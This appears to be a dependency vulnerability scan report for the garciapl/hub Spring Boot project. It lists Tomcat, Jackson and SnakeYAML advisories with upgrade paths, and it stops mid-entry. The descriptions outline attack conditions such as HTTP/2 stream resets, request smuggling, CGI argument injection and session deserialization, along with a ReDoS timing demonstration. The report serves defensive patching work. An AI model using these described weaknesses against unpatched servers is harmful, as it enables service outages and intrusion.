garciapl/hub

Vulnerabilities

57 via 198 paths

Dependencies

43

Source

GitHub

Commit

ec53d61d

critical severity

Insecure Defaults

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Insecure Defaults. The default settings for the CORS filter are insecure and enable supportsCredentials for all origins.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.89, 8.0.53, 8.5.32, 9.0.9 or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.datatype:jackson-datatype-joda@2.8.11 and org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 com.fasterxml.jackson.datatype:jackson-datatype-joda@2.8.11 com.fasterxml.jackson.core:jackson-core@2.8.11
    Remediation: Upgrade to com.fasterxml.jackson.datatype:jackson-datatype-joda@2.15.0.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 com.fasterxml.jackson.datatype:jackson-datatype-joda@2.8.11 com.fasterxml.jackson.core:jackson-databind@2.19.0 com.fasterxml.jackson.core:jackson-core@2.8.11
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE com.fasterxml.jackson.core:jackson-databind@2.19.0 com.fasterxml.jackson.core:jackson-core@2.8.11

Overview

com.fasterxml.jackson.core:jackson-core provides the core Jackson abstractions and the basic JSON streaming API implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input size validation when performing numeric type conversions. A remote attacker can exploit this vulnerability by causing the application to deserialize data containing certain numeric types with large values, causing the application to exhaust all available resources.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One common form of Denial of Service is DDoS (Distributed Denial of Service), an attack that attempts to clog the network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by exploiting a flaw either in the application code or in the open source libraries it uses.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sends crafted requests that cause the system to take a disproportionate amount of time to process them. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sends crafted requests that cause the system to crash. For example, the npm ws package.

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the implementation of the HTTP/2 protocol. An attacker can cause a denial of service (including via DDoS) by rapidly resetting many streams through request cancellation.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

high severity

Insufficient Session Expiration

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.7.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Insufficient Session Expiration due to an infinite timeout being improperly assigned to an open connection in http2/Stream.java. An attacker can force this situation by sending an HTTP/2 stream with excessive headers, causing an out-of-memory error or exhausting maxConnections.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.90, 10.1.25, 11.0.0-M21 or higher.

high severity

Improper Input Validation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.18.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.18.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation due to the improper parsing of HTTP trailer headers. An attacker can manipulate the server into treating a single request as multiple requests by sending a trailer header that exceeds the header size limit. This could lead to request smuggling when the server is behind a reverse proxy.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.96, 9.0.83, 10.1.16, 11.0.0-M10 or higher.

high severity

Remote Code Execution

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Remote Code Execution due to a bug in the way the underlying Java Runtime Environment (JRE) passes command line arguments on Windows systems when the option enableCmdLineArguments is enabled.

The CGI Servlet in Apache Tomcat, when enabled, passes user input to the underlying operating system for command line parsing. However, this process is not consistent and may allow the injection of additional arguments. This misconfiguration could be abused by attackers to execute code on the application's underlying operating system.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.94, 8.5.40, 9.0.18 or higher.

high severity

Remote Code Execution (RCE)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). Using a specifically crafted request, an attacker is able to trigger remote code execution via deserialization of a file under their control when all of the following conditions hold:

  • the attacker is able to control the contents and name of a file on the server;
  • the server is configured to use the PersistenceManager with a FileStore;
  • the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker-provided object to be deserialized;
  • the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M5, 9.0.35, 8.5.55, 7.0.104 or higher.

high severity

Insecure Temporary File

  • Vulnerable module: org.springframework.boot:spring-boot
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.11.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.11.RELEASE.

Overview

Affected versions of this package are vulnerable to Insecure Temporary File via the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method, allowing for temporary directory hijacking and privilege escalation.

Remediation

Upgrade org.springframework.boot:spring-boot to version 2.2.11.RELEASE or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). When Tomcat is configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially-crafted packet could be used to trigger an infinite loop resulting in a denial of service.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.4, 8.5.64, 9.0.44 or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). A specially crafted sequence of HTTP/2 requests could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.56, 9.0.36, 10.0.0-M6 or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). By not sending WINDOW_UPDATE messages for the connection window, clients were able to cause server-side threads to block, eventually leading to thread exhaustion and a DoS.

Note: This vulnerability is due to an incomplete fix for CVE-2019-0199.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.40, 9.0.20 or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.20.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.20.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). The HTTP/2 implementation accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportionate amount of time to process.

Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A: the string must start with the letter 'A'.
  • (B|C+)+: the string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D: finally, we ensure this section of the string ends with a 'D'.

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character-long string takes around 52 ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. In these extreme situations the engine works very slowly (the number of steps grows exponentially with input size, as shown above), so an attacker who can supply such input can make the service consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.38, 9.0.16 or higher.

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) via the UTF-8 decoder. When handling some special characters, the decoder may enter an infinite loop, thus denying service to other requests.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.90, 8.0.52, 8.5.32, 9.0.10 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) when processing a crafted HTTP/2 request. If the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they focus on making websites and services unavailable to genuine users, resulting in downtime.

One well-known form of Denial of Service is DDoS (Distributed Denial of Service), an attack that attempts to clog the network pipes to the system by generating a large volume of traffic from many machines.

In the context of open source libraries, a DoS vulnerability lets an attacker crash or cripple the service through a flaw either in the application code or in the open source libraries it uses.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sends crafted requests that cause the system to take a disproportionate amount of time to process them. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sends crafted requests that cause the system to crash. For example, the npm ws package.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.99, 9.0.86, 10.1.19, 1.0.0-M17 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-websocket
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) when a WebSocket client keeps a WebSocket connection open, leading to increased resource consumption.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-websocket to version 8.5.99, 9.0.86, 10.1.19, 1.0.0-M17 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.springframework.boot:spring-boot-autoconfigure
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) if Spring MVC is used together with a reverse proxy cache.

Specifically, an application is vulnerable if all of the conditions are true:

  • The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath.
  • The application uses Spring Boot's welcome page support, either static or templated.
  • The application is deployed behind a proxy which caches 404 responses.

The application is NOT vulnerable if any of the following are true:

  • Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET.
  • The application does not use Spring Boot's welcome page support.
  • There is no proxy which caches 404 responses.

Workaround

Users who are unable to upgrade should configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application.

Remediation

Upgrade org.springframework.boot:spring-boot-autoconfigure to version 2.5.15, 2.6.15, 2.7.12, 3.0.7 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-38749

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-25857

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

high severity

Remote Code Execution (RCE)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9484. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.2, 9.0.43, 8.5.63, 7.0.108 or higher.

References

medium severity

Arbitrary Code Execution

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.0.

Overview

